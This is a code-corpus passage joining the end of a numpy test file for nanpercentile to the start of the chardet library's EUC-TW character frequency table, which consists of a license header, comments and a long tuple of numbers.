nan_mat = np.insert(mat, [0, 2], np.nan, axis=1)
resout = np.zeros(3)
tgt = np.percentile(mat, 42, axis=1)
res = np.nanpercentile(nan_mat, 42, axis=1, out=resout)
assert_almost_equal(res, resout)
assert_almost_equal(res, tgt)
# 0-d output:
resout = np.zeros(())
tgt = np.percentile(mat, 42, axis=None)
res = np.nanpercentile(nan_mat, 42, axis=None, out=resout)
assert_almost_equal(res, resout)
assert_almost_equal(res, tgt)
res = np.nanpercentile(nan_mat, 42, axis=(0, 1), out=resout)
assert_almost_equal(res, resout)
assert_almost_equal(res, tgt)
def test_result_values(self):
tgt = [np.percentile(d, 28) for d in _rdat]
res = np.nanpercentile(_ndat, 28, axis=1)
assert_almost_equal(res, tgt)
tgt = [np.percentile(d, (28, 98)) for d in _rdat]
res = np.nanpercentile(_ndat, (28, 98), axis=1)
assert_almost_equal(res, tgt)
def test_allnans(self):
mat = np.array([np.nan]*9).reshape(3, 3)
for axis in [None, 0, 1]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
assert_(np.isnan(np.nanpercentile(mat, 60, axis=axis)).all())
if axis is None:
assert_(len(w) == 1)
else:
assert_(len(w) == 3)
assert_(issubclass(w[0].category, RuntimeWarning))
# Check scalar
assert_(np.isnan(np.nanpercentile(np.nan, 60)))
if axis is None:
assert_(len(w) == 2)
else:
assert_(len(w) == 4)
assert_(issubclass(w[0].category, RuntimeWarning))
def test_empty(self):
mat = np.zeros((0, 3))
for axis in [0, None]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
assert_(np.isnan(np.nanpercentile(mat, 40, axis=axis)).all())
assert_(len(w) == 1)
assert_(issubclass(w[0].category, RuntimeWarning))
for axis in [1]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
assert_equal(np.nanpercentile(mat, 40, axis=axis), np.zeros([]))
assert_(len(w) == 0)
def test_scalar(self):
assert_(np.nanpercentile(0., 100) == 0.)
def test_extended_axis_invalid(self):
d = np.ones((3, 5, 7, 11))
assert_raises(IndexError, np.nanpercentile, d, q=5, axis=-5)
assert_raises(IndexError, np.nanpercentile, d, q=5, axis=(0, -5))
assert_raises(IndexError, np.nanpercentile, d, q=5, axis=4)
assert_raises(IndexError, np.nanpercentile, d, q=5, axis=(0, 4))
assert_raises(ValueError, np.nanpercentile, d, q=5, axis=(1, 1))
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause |
jpmec/sappy | python_env/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/euctwfreq.py | 3133 | 34872 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# EUCTW frequency table
# Converted from big5 work
# by Taiwan's Mandarin Promotion Council
# <http:#www.edu.tw:81/mandr/>
# 128 --> 0.42261
# 256 --> 0.57851
# 512 --> 0.74851
# 1024 --> 0.89384
# 2048 --> 0.97583
#
# Idea Distribution Ratio = 0.74851/(1-0.74851) =2.98
# Random Distribution Ration = 512/(5401-512)=0.105
#
# Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR
EUCTW_TYPICAL_DISTRIBUTION_RATIO = 0.75
# Char to FreqOrder table ,
EUCTW_TABLE_SIZE = 8102
EUCTWCharToFreqOrder = (
1,1800,1506, 255,1431, 198, 9, 82, 6,7310, 177, 202,3615,1256,2808, 110, # 2742
3735, 33,3241, 261, 76, 44,2113, 16,2931,2184,1176, 659,3868, 26,3404,2643, # 2758
1198,3869,3313,4060, 410,2211, 302, 590, 361,1963, 8, 204, 58,4296,7311,1931, # 2774
63,7312,7313, 317,1614, 75, 222, 159,4061,2412,1480,7314,3500,3068, 224,2809, # 2790
3616, 3, 10,3870,1471, 29,2774,1135,2852,1939, 873, 130,3242,1123, 312,7315, # 2806
4297,2051, 507, 252, 682,7316, 142,1914, 124, 206,2932, 34,3501,3173, 64, 604, # 2822
7317,2494,1976,1977, 155,1990, 645, 641,1606,7318,3405, 337, 72, 406,7319, 80, # 2838
630, 238,3174,1509, 263, 939,1092,2644, 756,1440,1094,3406, 449, 69,2969, 591, # 2854
179,2095, 471, 115,2034,1843, 60, 50,2970, 134, 806,1868, 734,2035,3407, 180, # 2870
995,1607, 156, 537,2893, 688,7320, 319,1305, 779,2144, 514,2374, 298,4298, 359, # 2886
2495, 90,2707,1338, 663, 11, 906,1099,2545, 20,2436, 182, 532,1716,7321, 732, # 2902
1376,4062,1311,1420,3175, 25,2312,1056, 113, 399, 382,1949, 242,3408,2467, 529, # 2918
3243, 475,1447,3617,7322, 117, 21, 656, 810,1297,2295,2329,3502,7323, 126,4063, # 2934
706, 456, 150, 613,4299, 71,1118,2036,4064, 145,3069, 85, 835, 486,2114,1246, # 2950
1426, 428, 727,1285,1015, 800, 106, 623, 303,1281,7324,2127,2354, 347,3736, 221, # 2966
3503,3110,7325,1955,1153,4065, 83, 296,1199,3070, 192, 624, 93,7326, 822,1897, # 2982
2810,3111, 795,2064, 991,1554,1542,1592, 27, 43,2853, 859, 139,1456, 860,4300, # 2998
437, 712,3871, 164,2392,3112, 695, 211,3017,2096, 195,3872,1608,3504,3505,3618, # 3014
3873, 234, 811,2971,2097,3874,2229,1441,3506,1615,2375, 668,2076,1638, 305, 228, # 3030
1664,4301, 467, 415,7327, 262,2098,1593, 239, 108, 300, 200,1033, 512,1247,2077, # 3046
7328,7329,2173,3176,3619,2673, 593, 845,1062,3244, 88,1723,2037,3875,1950, 212, # 3062
266, 152, 149, 468,1898,4066,4302, 77, 187,7330,3018, 37, 5,2972,7331,3876, # 3078
7332,7333, 39,2517,4303,2894,3177,2078, 55, 148, 74,4304, 545, 483,1474,1029, # 3094
1665, 217,1869,1531,3113,1104,2645,4067, 24, 172,3507, 900,3877,3508,3509,4305, # 3110
32,1408,2811,1312, 329, 487,2355,2247,2708, 784,2674, 4,3019,3314,1427,1788, # 3126
188, 109, 499,7334,3620,1717,1789, 888,1217,3020,4306,7335,3510,7336,3315,1520, # 3142
3621,3878, 196,1034, 775,7337,7338, 929,1815, 249, 439, 38,7339,1063,7340, 794, # 3158
3879,1435,2296, 46, 178,3245,2065,7341,2376,7342, 214,1709,4307, 804, 35, 707, # 3174
324,3622,1601,2546, 140, 459,4068,7343,7344,1365, 839, 272, 978,2257,2572,3409, # 3190
2128,1363,3623,1423, 697, 100,3071, 48, 70,1231, 495,3114,2193,7345,1294,7346, # 3206
2079, 462, 586,1042,3246, 853, 256, 988, 185,2377,3410,1698, 434,1084,7347,3411, # 3222
314,2615,2775,4308,2330,2331, 569,2280, 637,1816,2518, 757,1162,1878,1616,3412, # 3238
287,1577,2115, 768,4309,1671,2854,3511,2519,1321,3737, 909,2413,7348,4069, 933, # 3254
3738,7349,2052,2356,1222,4310, 765,2414,1322, 786,4311,7350,1919,1462,1677,2895, # 3270
1699,7351,4312,1424,2437,3115,3624,2590,3316,1774,1940,3413,3880,4070, 309,1369, # 3286
1130,2812, 364,2230,1653,1299,3881,3512,3882,3883,2646, 525,1085,3021, 902,2000, # 3302
1475, 964,4313, 421,1844,1415,1057,2281, 940,1364,3116, 376,4314,4315,1381, 7, # 3318
2520, 983,2378, 336,1710,2675,1845, 321,3414, 559,1131,3022,2742,1808,1132,1313, # 3334
265,1481,1857,7352, 352,1203,2813,3247, 167,1089, 420,2814, 776, 792,1724,3513, # 3350
4071,2438,3248,7353,4072,7354, 446, 229, 333,2743, 901,3739,1200,1557,4316,2647, # 3366
1920, 395,2744,2676,3740,4073,1835, 125, 916,3178,2616,4317,7355,7356,3741,7357, # 3382
7358,7359,4318,3117,3625,1133,2547,1757,3415,1510,2313,1409,3514,7360,2145, 438, # 3398
2591,2896,2379,3317,1068, 958,3023, 461, 311,2855,2677,4074,1915,3179,4075,1978, # 3414
383, 750,2745,2617,4076, 274, 539, 385,1278,1442,7361,1154,1964, 384, 561, 210, # 3430
98,1295,2548,3515,7362,1711,2415,1482,3416,3884,2897,1257, 129,7363,3742, 642, # 3446
523,2776,2777,2648,7364, 141,2231,1333, 68, 176, 441, 876, 907,4077, 603,2592, # 3462
710, 171,3417, 404, 549, 18,3118,2393,1410,3626,1666,7365,3516,4319,2898,4320, # 3478
7366,2973, 368,7367, 146, 366, 99, 871,3627,1543, 748, 807,1586,1185, 22,2258, # 3494
379,3743,3180,7368,3181, 505,1941,2618,1991,1382,2314,7369, 380,2357, 218, 702, # 3510
1817,1248,3418,3024,3517,3318,3249,7370,2974,3628, 930,3250,3744,7371, 59,7372, # 3526
585, 601,4078, 497,3419,1112,1314,4321,1801,7373,1223,1472,2174,7374, 749,1836, # 3542
690,1899,3745,1772,3885,1476, 429,1043,1790,2232,2116, 917,4079, 447,1086,1629, # 3558
7375, 556,7376,7377,2020,1654, 844,1090, 105, 550, 966,1758,2815,1008,1782, 686, # 3574
1095,7378,2282, 793,1602,7379,3518,2593,4322,4080,2933,2297,4323,3746, 980,2496, # 3590
544, 353, 527,4324, 908,2678,2899,7380, 381,2619,1942,1348,7381,1341,1252, 560, # 3606
3072,7382,3420,2856,7383,2053, 973, 886,2080, 143,4325,7384,7385, 157,3886, 496, # 3622
4081, 57, 840, 540,2038,4326,4327,3421,2117,1445, 970,2259,1748,1965,2081,4082, # 3638
3119,1234,1775,3251,2816,3629, 773,1206,2129,1066,2039,1326,3887,1738,1725,4083, # 3654
279,3120, 51,1544,2594, 423,1578,2130,2066, 173,4328,1879,7386,7387,1583, 264, # 3670
610,3630,4329,2439, 280, 154,7388,7389,7390,1739, 338,1282,3073, 693,2857,1411, # 3686
1074,3747,2440,7391,4330,7392,7393,1240, 952,2394,7394,2900,1538,2679, 685,1483, # 3702
4084,2468,1436, 953,4085,2054,4331, 671,2395, 79,4086,2441,3252, 608, 567,2680, # 3718
3422,4087,4088,1691, 393,1261,1791,2396,7395,4332,7396,7397,7398,7399,1383,1672, # 3734
3748,3182,1464, 522,1119, 661,1150, 216, 675,4333,3888,1432,3519, 609,4334,2681, # 3750
2397,7400,7401,7402,4089,3025, 0,7403,2469, 315, 231,2442, 301,3319,4335,2380, # 3766
7404, 233,4090,3631,1818,4336,4337,7405, 96,1776,1315,2082,7406, 257,7407,1809, # 3782
3632,2709,1139,1819,4091,2021,1124,2163,2778,1777,2649,7408,3074, 363,1655,3183, # 3798
7409,2975,7410,7411,7412,3889,1567,3890, 718, 103,3184, 849,1443, 341,3320,2934, # 3814
1484,7413,1712, 127, 67, 339,4092,2398, 679,1412, 821,7414,7415, 834, 738, 351, # 3830
2976,2146, 846, 235,1497,1880, 418,1992,3749,2710, 186,1100,2147,2746,3520,1545, # 3846
1355,2935,2858,1377, 583,3891,4093,2573,2977,7416,1298,3633,1078,2549,3634,2358, # 3862
78,3750,3751, 267,1289,2099,2001,1594,4094, 348, 369,1274,2194,2175,1837,4338, # 3878
1820,2817,3635,2747,2283,2002,4339,2936,2748, 144,3321, 882,4340,3892,2749,3423, # 3894
4341,2901,7417,4095,1726, 320,7418,3893,3026, 788,2978,7419,2818,1773,1327,2859, # 3910
3894,2819,7420,1306,4342,2003,1700,3752,3521,2359,2650, 787,2022, 506, 824,3636, # 3926
534, 323,4343,1044,3322,2023,1900, 946,3424,7421,1778,1500,1678,7422,1881,4344, # 3942
165, 243,4345,3637,2521, 123, 683,4096, 764,4346, 36,3895,1792, 589,2902, 816, # 3958
626,1667,3027,2233,1639,1555,1622,3753,3896,7423,3897,2860,1370,1228,1932, 891, # 3974
2083,2903, 304,4097,7424, 292,2979,2711,3522, 691,2100,4098,1115,4347, 118, 662, # 3990
7425, 611,1156, 854,2381,1316,2861, 2, 386, 515,2904,7426,7427,3253, 868,2234, # 4006
1486, 855,2651, 785,2212,3028,7428,1040,3185,3523,7429,3121, 448,7430,1525,7431, # 4022
2164,4348,7432,3754,7433,4099,2820,3524,3122, 503, 818,3898,3123,1568, 814, 676, # 4038
1444, 306,1749,7434,3755,1416,1030, 197,1428, 805,2821,1501,4349,7435,7436,7437, # 4054
1993,7438,4350,7439,7440,2195, 13,2779,3638,2980,3124,1229,1916,7441,3756,2131, # 4070
7442,4100,4351,2399,3525,7443,2213,1511,1727,1120,7444,7445, 646,3757,2443, 307, # 4086
7446,7447,1595,3186,7448,7449,7450,3639,1113,1356,3899,1465,2522,2523,7451, 519, # 4102
7452, 128,2132, 92,2284,1979,7453,3900,1512, 342,3125,2196,7454,2780,2214,1980, # 4118
3323,7455, 290,1656,1317, 789, 827,2360,7456,3758,4352, 562, 581,3901,7457, 401, # 4134
4353,2248, 94,4354,1399,2781,7458,1463,2024,4355,3187,1943,7459, 828,1105,4101, # 4150
1262,1394,7460,4102, 605,4356,7461,1783,2862,7462,2822, 819,2101, 578,2197,2937, # 4166
7463,1502, 436,3254,4103,3255,2823,3902,2905,3425,3426,7464,2712,2315,7465,7466, # 4182
2332,2067, 23,4357, 193, 826,3759,2102, 699,1630,4104,3075, 390,1793,1064,3526, # 4198
7467,1579,3076,3077,1400,7468,4105,1838,1640,2863,7469,4358,4359, 137,4106, 598, # 4214
3078,1966, 780, 104, 974,2938,7470, 278, 899, 253, 402, 572, 504, 493,1339,7471, # 4230
3903,1275,4360,2574,2550,7472,3640,3029,3079,2249, 565,1334,2713, 863, 41,7473, # 4246
7474,4361,7475,1657,2333, 19, 463,2750,4107, 606,7476,2981,3256,1087,2084,1323, # 4262
2652,2982,7477,1631,1623,1750,4108,2682,7478,2864, 791,2714,2653,2334, 232,2416, # 4278
7479,2983,1498,7480,2654,2620, 755,1366,3641,3257,3126,2025,1609, 119,1917,3427, # 4294
862,1026,4109,7481,3904,3760,4362,3905,4363,2260,1951,2470,7482,1125, 817,4110, # 4310
4111,3906,1513,1766,2040,1487,4112,3030,3258,2824,3761,3127,7483,7484,1507,7485, # 4326
2683, 733, 40,1632,1106,2865, 345,4113, 841,2524, 230,4364,2984,1846,3259,3428, # 4342
7486,1263, 986,3429,7487, 735, 879, 254,1137, 857, 622,1300,1180,1388,1562,3907, # 4358
3908,2939, 967,2751,2655,1349, 592,2133,1692,3324,2985,1994,4114,1679,3909,1901, # 4374
2185,7488, 739,3642,2715,1296,1290,7489,4115,2198,2199,1921,1563,2595,2551,1870, # 4390
2752,2986,7490, 435,7491, 343,1108, 596, 17,1751,4365,2235,3430,3643,7492,4366, # 4406
294,3527,2940,1693, 477, 979, 281,2041,3528, 643,2042,3644,2621,2782,2261,1031, # 4422
2335,2134,2298,3529,4367, 367,1249,2552,7493,3530,7494,4368,1283,3325,2004, 240, # 4438
1762,3326,4369,4370, 836,1069,3128, 474,7495,2148,2525, 268,3531,7496,3188,1521, # 4454
1284,7497,1658,1546,4116,7498,3532,3533,7499,4117,3327,2684,1685,4118, 961,1673, # 4470
2622, 190,2005,2200,3762,4371,4372,7500, 570,2497,3645,1490,7501,4373,2623,3260, # 4486
1956,4374, 584,1514, 396,1045,1944,7502,4375,1967,2444,7503,7504,4376,3910, 619, # 4502
7505,3129,3261, 215,2006,2783,2553,3189,4377,3190,4378, 763,4119,3763,4379,7506, # 4518
7507,1957,1767,2941,3328,3646,1174, 452,1477,4380,3329,3130,7508,2825,1253,2382, # 4534
2186,1091,2285,4120, 492,7509, 638,1169,1824,2135,1752,3911, 648, 926,1021,1324, # 4550
4381, 520,4382, 997, 847,1007, 892,4383,3764,2262,1871,3647,7510,2400,1784,4384, # 4566
1952,2942,3080,3191,1728,4121,2043,3648,4385,2007,1701,3131,1551, 30,2263,4122, # 4582
7511,2026,4386,3534,7512, 501,7513,4123, 594,3431,2165,1821,3535,3432,3536,3192, # 4598
829,2826,4124,7514,1680,3132,1225,4125,7515,3262,4387,4126,3133,2336,7516,4388, # 4614
4127,7517,3912,3913,7518,1847,2383,2596,3330,7519,4389, 374,3914, 652,4128,4129, # 4630
375,1140, 798,7520,7521,7522,2361,4390,2264, 546,1659, 138,3031,2445,4391,7523, # 4646
2250, 612,1848, 910, 796,3765,1740,1371, 825,3766,3767,7524,2906,2554,7525, 692, # 4662
444,3032,2624, 801,4392,4130,7526,1491, 244,1053,3033,4131,4132, 340,7527,3915, # 4678
1041,2987, 293,1168, 87,1357,7528,1539, 959,7529,2236, 721, 694,4133,3768, 219, # 4694
1478, 644,1417,3331,2656,1413,1401,1335,1389,3916,7530,7531,2988,2362,3134,1825, # 4710
730,1515, 184,2827, 66,4393,7532,1660,2943, 246,3332, 378,1457, 226,3433, 975, # 4726
3917,2944,1264,3537, 674, 696,7533, 163,7534,1141,2417,2166, 713,3538,3333,4394, # 4742
3918,7535,7536,1186, 15,7537,1079,1070,7538,1522,3193,3539, 276,1050,2716, 758, # 4758
1126, 653,2945,3263,7539,2337, 889,3540,3919,3081,2989, 903,1250,4395,3920,3434, # 4774
3541,1342,1681,1718, 766,3264, 286, 89,2946,3649,7540,1713,7541,2597,3334,2990, # 4790
7542,2947,2215,3194,2866,7543,4396,2498,2526, 181, 387,1075,3921, 731,2187,3335, # 4806
7544,3265, 310, 313,3435,2299, 770,4134, 54,3034, 189,4397,3082,3769,3922,7545, # 4822
1230,1617,1849, 355,3542,4135,4398,3336, 111,4136,3650,1350,3135,3436,3035,4137, # 4838
2149,3266,3543,7546,2784,3923,3924,2991, 722,2008,7547,1071, 247,1207,2338,2471, # 4854
1378,4399,2009, 864,1437,1214,4400, 373,3770,1142,2216, 667,4401, 442,2753,2555, # 4870
3771,3925,1968,4138,3267,1839, 837, 170,1107, 934,1336,1882,7548,7549,2118,4139, # 4886
2828, 743,1569,7550,4402,4140, 582,2384,1418,3437,7551,1802,7552, 357,1395,1729, # 4902
3651,3268,2418,1564,2237,7553,3083,3772,1633,4403,1114,2085,4141,1532,7554, 482, # 4918
2446,4404,7555,7556,1492, 833,1466,7557,2717,3544,1641,2829,7558,1526,1272,3652, # 4934
4142,1686,1794, 416,2556,1902,1953,1803,7559,3773,2785,3774,1159,2316,7560,2867, # 4950
4405,1610,1584,3036,2419,2754, 443,3269,1163,3136,7561,7562,3926,7563,4143,2499, # 4966
3037,4406,3927,3137,2103,1647,3545,2010,1872,4144,7564,4145, 431,3438,7565, 250, # 4982
97, 81,4146,7566,1648,1850,1558, 160, 848,7567, 866, 740,1694,7568,2201,2830, # 4998
3195,4147,4407,3653,1687, 950,2472, 426, 469,3196,3654,3655,3928,7569,7570,1188, # 5014
424,1995, 861,3546,4148,3775,2202,2685, 168,1235,3547,4149,7571,2086,1674,4408, # 5030
3337,3270, 220,2557,1009,7572,3776, 670,2992, 332,1208, 717,7573,7574,3548,2447, # 5046
3929,3338,7575, 513,7576,1209,2868,3339,3138,4409,1080,7577,7578,7579,7580,2527, # 5062
3656,3549, 815,1587,3930,3931,7581,3550,3439,3777,1254,4410,1328,3038,1390,3932, # 5078
1741,3933,3778,3934,7582, 236,3779,2448,3271,7583,7584,3657,3780,1273,3781,4411, # 5094
7585, 308,7586,4412, 245,4413,1851,2473,1307,2575, 430, 715,2136,2449,7587, 270, # 5110
199,2869,3935,7588,3551,2718,1753, 761,1754, 725,1661,1840,4414,3440,3658,7589, # 5126
7590, 587, 14,3272, 227,2598, 326, 480,2265, 943,2755,3552, 291, 650,1883,7591, # 5142
1702,1226, 102,1547, 62,3441, 904,4415,3442,1164,4150,7592,7593,1224,1548,2756, # 5158
391, 498,1493,7594,1386,1419,7595,2055,1177,4416, 813, 880,1081,2363, 566,1145, # 5174
4417,2286,1001,1035,2558,2599,2238, 394,1286,7596,7597,2068,7598, 86,1494,1730, # 5190
3936, 491,1588, 745, 897,2948, 843,3340,3937,2757,2870,3273,1768, 998,2217,2069, # 5206
397,1826,1195,1969,3659,2993,3341, 284,7599,3782,2500,2137,2119,1903,7600,3938, # 5222
2150,3939,4151,1036,3443,1904, 114,2559,4152, 209,1527,7601,7602,2949,2831,2625, # 5238
2385,2719,3139, 812,2560,7603,3274,7604,1559, 737,1884,3660,1210, 885, 28,2686, # 5254
3553,3783,7605,4153,1004,1779,4418,7606, 346,1981,2218,2687,4419,3784,1742, 797, # 5270
1642,3940,1933,1072,1384,2151, 896,3941,3275,3661,3197,2871,3554,7607,2561,1958, # 5286
4420,2450,1785,7608,7609,7610,3942,4154,1005,1308,3662,4155,2720,4421,4422,1528, # 5302
2600, 161,1178,4156,1982, 987,4423,1101,4157, 631,3943,1157,3198,2420,1343,1241, # 5318
1016,2239,2562, 372, 877,2339,2501,1160, 555,1934, 911,3944,7611, 466,1170, 169, # 5334
1051,2907,2688,3663,2474,2994,1182,2011,2563,1251,2626,7612, 992,2340,3444,1540, # 5350
2721,1201,2070,2401,1996,2475,7613,4424, 528,1922,2188,1503,1873,1570,2364,3342, # 5366
3276,7614, 557,1073,7615,1827,3445,2087,2266,3140,3039,3084, 767,3085,2786,4425, # 5382
1006,4158,4426,2341,1267,2176,3664,3199, 778,3945,3200,2722,1597,2657,7616,4427, # 5398
7617,3446,7618,7619,7620,3277,2689,1433,3278, 131, 95,1504,3946, 723,4159,3141, # 5414
1841,3555,2758,2189,3947,2027,2104,3665,7621,2995,3948,1218,7622,3343,3201,3949, # 5430
4160,2576, 248,1634,3785, 912,7623,2832,3666,3040,3786, 654, 53,7624,2996,7625, # 5446
1688,4428, 777,3447,1032,3950,1425,7626, 191, 820,2120,2833, 971,4429, 931,3202, # 5462
135, 664, 783,3787,1997, 772,2908,1935,3951,3788,4430,2909,3203, 282,2723, 640, # 5478
1372,3448,1127, 922, 325,3344,7627,7628, 711,2044,7629,7630,3952,2219,2787,1936, # 5494
3953,3345,2220,2251,3789,2300,7631,4431,3790,1258,3279,3954,3204,2138,2950,3955, # 5510
3956,7632,2221, 258,3205,4432, 101,1227,7633,3280,1755,7634,1391,3281,7635,2910, # 5526
2056, 893,7636,7637,7638,1402,4161,2342,7639,7640,3206,3556,7641,7642, 878,1325, # 5542
1780,2788,4433, 259,1385,2577, 744,1183,2267,4434,7643,3957,2502,7644, 684,1024, # 5558
4162,7645, 472,3557,3449,1165,3282,3958,3959, 322,2152, 881, 455,1695,1152,1340, # 5574
660, 554,2153,4435,1058,4436,4163, 830,1065,3346,3960,4437,1923,7646,1703,1918, # 5590
7647, 932,2268, 122,7648,4438, 947, 677,7649,3791,2627, 297,1905,1924,2269,4439, # 5606
2317,3283,7650,7651,4164,7652,4165, 84,4166, 112, 989,7653, 547,1059,3961, 701, # 5622
3558,1019,7654,4167,7655,3450, 942, 639, 457,2301,2451, 993,2951, 407, 851, 494, # 5638
4440,3347, 927,7656,1237,7657,2421,3348, 573,4168, 680, 921,2911,1279,1874, 285, # 5654
790,1448,1983, 719,2167,7658,7659,4441,3962,3963,1649,7660,1541, 563,7661,1077, # 5670
7662,3349,3041,3451, 511,2997,3964,3965,3667,3966,1268,2564,3350,3207,4442,4443, # 5686
7663, 535,1048,1276,1189,2912,2028,3142,1438,1373,2834,2952,1134,2012,7664,4169, # 5702
1238,2578,3086,1259,7665, 700,7666,2953,3143,3668,4170,7667,4171,1146,1875,1906, # 5718
4444,2601,3967, 781,2422, 132,1589, 203, 147, 273,2789,2402, 898,1786,2154,3968, # 5734
3969,7668,3792,2790,7669,7670,4445,4446,7671,3208,7672,1635,3793, 965,7673,1804, # 5750
2690,1516,3559,1121,1082,1329,3284,3970,1449,3794, 65,1128,2835,2913,2759,1590, # 5766
3795,7674,7675, 12,2658, 45, 976,2579,3144,4447, 517,2528,1013,1037,3209,7676, # 5782
3796,2836,7677,3797,7678,3452,7679,2602, 614,1998,2318,3798,3087,2724,2628,7680, # 5798
2580,4172, 599,1269,7681,1810,3669,7682,2691,3088, 759,1060, 489,1805,3351,3285, # 5814
1358,7683,7684,2386,1387,1215,2629,2252, 490,7685,7686,4173,1759,2387,2343,7687, # 5830
4448,3799,1907,3971,2630,1806,3210,4449,3453,3286,2760,2344, 874,7688,7689,3454, # 5846
3670,1858, 91,2914,3671,3042,3800,4450,7690,3145,3972,2659,7691,3455,1202,1403, # 5862
3801,2954,2529,1517,2503,4451,3456,2504,7692,4452,7693,2692,1885,1495,1731,3973, # 5878
2365,4453,7694,2029,7695,7696,3974,2693,1216, 237,2581,4174,2319,3975,3802,4454, # 5894
4455,2694,3560,3457, 445,4456,7697,7698,7699,7700,2761, 61,3976,3672,1822,3977, # 5910
7701, 687,2045, 935, 925, 405,2660, 703,1096,1859,2725,4457,3978,1876,1367,2695, # 5926
3352, 918,2105,1781,2476, 334,3287,1611,1093,4458, 564,3146,3458,3673,3353, 945, # 5942
2631,2057,4459,7702,1925, 872,4175,7703,3459,2696,3089, 349,4176,3674,3979,4460, # 5958
3803,4177,3675,2155,3980,4461,4462,4178,4463,2403,2046, 782,3981, 400, 251,4179, # 5974
1624,7704,7705, 277,3676, 299,1265, 476,1191,3804,2121,4180,4181,1109, 205,7706, # 5990
2582,1000,2156,3561,1860,7707,7708,7709,4464,7710,4465,2565, 107,2477,2157,3982, # 6006
3460,3147,7711,1533, 541,1301, 158, 753,4182,2872,3562,7712,1696, 370,1088,4183, # 6022
4466,3563, 579, 327, 440, 162,2240, 269,1937,1374,3461, 968,3043, 56,1396,3090, # 6038
2106,3288,3354,7713,1926,2158,4467,2998,7714,3564,7715,7716,3677,4468,2478,7717, # 6054
2791,7718,1650,4469,7719,2603,7720,7721,3983,2661,3355,1149,3356,3984,3805,3985, # 6070
7722,1076, 49,7723, 951,3211,3289,3290, 450,2837, 920,7724,1811,2792,2366,4184, # 6086
1908,1138,2367,3806,3462,7725,3212,4470,1909,1147,1518,2423,4471,3807,7726,4472, # 6102
2388,2604, 260,1795,3213,7727,7728,3808,3291, 708,7729,3565,1704,7730,3566,1351, # 6118
1618,3357,2999,1886, 944,4185,3358,4186,3044,3359,4187,7731,3678, 422, 413,1714, # 6134
3292, 500,2058,2345,4188,2479,7732,1344,1910, 954,7733,1668,7734,7735,3986,2404, # 6150
4189,3567,3809,4190,7736,2302,1318,2505,3091, 133,3092,2873,4473, 629, 31,2838, # 6166
2697,3810,4474, 850, 949,4475,3987,2955,1732,2088,4191,1496,1852,7737,3988, 620, # 6182
3214, 981,1242,3679,3360,1619,3680,1643,3293,2139,2452,1970,1719,3463,2168,7738, # 6198
3215,7739,7740,3361,1828,7741,1277,4476,1565,2047,7742,1636,3568,3093,7743, 869, # 6214
2839, 655,3811,3812,3094,3989,3000,3813,1310,3569,4477,7744,7745,7746,1733, 558, # 6230
4478,3681, 335,1549,3045,1756,4192,3682,1945,3464,1829,1291,1192, 470,2726,2107, # 6246
2793, 913,1054,3990,7747,1027,7748,3046,3991,4479, 982,2662,3362,3148,3465,3216, # 6262
3217,1946,2794,7749, 571,4480,7750,1830,7751,3570,2583,1523,2424,7752,2089, 984, # 6278
4481,3683,1959,7753,3684, 852, 923,2795,3466,3685, 969,1519, 999,2048,2320,1705, # 6294
7754,3095, 615,1662, 151, 597,3992,2405,2321,1049, 275,4482,3686,4193, 568,3687, # 6310
3571,2480,4194,3688,7755,2425,2270, 409,3218,7756,1566,2874,3467,1002, 769,2840, # 6326
194,2090,3149,3689,2222,3294,4195, 628,1505,7757,7758,1763,2177,3001,3993, 521, # 6342
1161,2584,1787,2203,2406,4483,3994,1625,4196,4197, 412, 42,3096, 464,7759,2632, # 6358
4484,3363,1760,1571,2875,3468,2530,1219,2204,3814,2633,2140,2368,4485,4486,3295, # 6374
1651,3364,3572,7760,7761,3573,2481,3469,7762,3690,7763,7764,2271,2091, 460,7765, # 6390
4487,7766,3002, 962, 588,3574, 289,3219,2634,1116, 52,7767,3047,1796,7768,7769, # 6406
7770,1467,7771,1598,1143,3691,4198,1984,1734,1067,4488,1280,3365, 465,4489,1572, # 6422
510,7772,1927,2241,1812,1644,3575,7773,4490,3692,7774,7775,2663,1573,1534,7776, # 6438
7777,4199, 536,1807,1761,3470,3815,3150,2635,7778,7779,7780,4491,3471,2915,1911, # 6454
2796,7781,3296,1122, 377,3220,7782, 360,7783,7784,4200,1529, 551,7785,2059,3693, # 6470
1769,2426,7786,2916,4201,3297,3097,2322,2108,2030,4492,1404, 136,1468,1479, 672, # 6486
1171,3221,2303, 271,3151,7787,2762,7788,2049, 678,2727, 865,1947,4493,7789,2013, # 6502
3995,2956,7790,2728,2223,1397,3048,3694,4494,4495,1735,2917,3366,3576,7791,3816, # 6518
509,2841,2453,2876,3817,7792,7793,3152,3153,4496,4202,2531,4497,2304,1166,1010, # 6534
552, 681,1887,7794,7795,2957,2958,3996,1287,1596,1861,3154, 358, 453, 736, 175, # 6550
478,1117, 905,1167,1097,7796,1853,1530,7797,1706,7798,2178,3472,2287,3695,3473, # 6566
3577,4203,2092,4204,7799,3367,1193,2482,4205,1458,2190,2205,1862,1888,1421,3298, # 6582
2918,3049,2179,3474, 595,2122,7800,3997,7801,7802,4206,1707,2636, 223,3696,1359, # 6598
751,3098, 183,3475,7803,2797,3003, 419,2369, 633, 704,3818,2389, 241,7804,7805, # 6614
7806, 838,3004,3697,2272,2763,2454,3819,1938,2050,3998,1309,3099,2242,1181,7807, # 6630
1136,2206,3820,2370,1446,4207,2305,4498,7808,7809,4208,1055,2605, 484,3698,7810, # 6646
